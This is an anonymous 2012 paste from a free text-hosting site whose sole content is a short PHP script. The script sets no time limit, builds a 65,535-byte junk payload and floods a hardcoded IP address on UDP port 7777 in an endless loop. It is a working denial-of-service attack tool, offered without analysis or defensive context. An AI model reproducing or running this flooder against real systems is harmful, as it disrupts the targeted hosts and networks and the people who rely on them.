FreeTextHost.in host your text & codes anonymously


FREE TEXT HOST

You can save codes, scripts, sources & general debugging text and share / access / use them at any time (anonymously).
You can even set yourself a password if you want to keep it just for yourself.

Posted by "Anonymous" on Thu, August 9th, 2012, 11:44 PM - Never Expires (Modification of post by Anonymous)
Download | New paste

  1. <?php
  2.  
  3.  
  4. set_time_limit(0);
  5. //ignore_user_abort(FALSE);
  6.  
  7. $ip = "186.223.187.133
  8. ";
  9. $rand = 7777;
  10. $out = "";
  11.  
  12.  
  13.  
  14. for($i=0;$i<65535;$i++){
  15.         $out .= "X";
  16. }
  17.  
  18. while(1) {
  19.         $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  20.         if($fp){
  21.                 fwrite($fp, $out);
  22.                 fclose($fp);   
  23.         }
  24. }
  25.  
  26. ?>
Language:
To highlight particular lines, prefix each line with @@








freetexthost.in © 2010-2013 - Powered by PASTE 1.0   website by GandhiG.com